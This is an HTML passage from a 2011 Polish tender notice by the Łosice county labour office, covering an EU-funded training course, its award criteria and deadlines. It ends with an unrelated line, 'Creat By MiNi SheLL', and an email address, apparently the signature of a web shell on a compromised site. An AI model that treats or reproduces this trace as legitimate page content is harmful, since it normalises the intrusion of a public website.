<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - doświadczenie wykonawcy w prowadzeniu tego typu szkoleń - 10</li>
<li>3 - kwalifikacje i doświadczenie kadry dydaktycznej - 20</li>
<li>4 - dostosowanie wyposażenia dydaktycznego i pomieszczeń do potrzeb szkolenia - 10</li>
<li>5 - posiadanie certyfikatu jakości usług lub dokumentów równowaznych - 10</li>
<li>6 - prowadzenie nadzoru wewnętrznego służącego podniesieniu jakości szkolenia - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puplosice.pl (zakładka - dokumenty do pobrania)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Łosicach, 
ul. Narutowicza 6
08-200 Łosice, pokój nr 59.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2011 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Łosicach, 
ul. Narutowicza 6
08-200 Łosice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie realizowane będzie w ramach projektu współfinansowanego z Europejskiego Funduszu Społecznego pod nazwą Smak  pracy  Priorytetu VI Rynek pracy otwarty dla wszystkich, Działanie 6.3 Inicjatywy lokalne na rzecz podnoszenia poziomu aktywności zawodowej na obszarach wiejskich Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com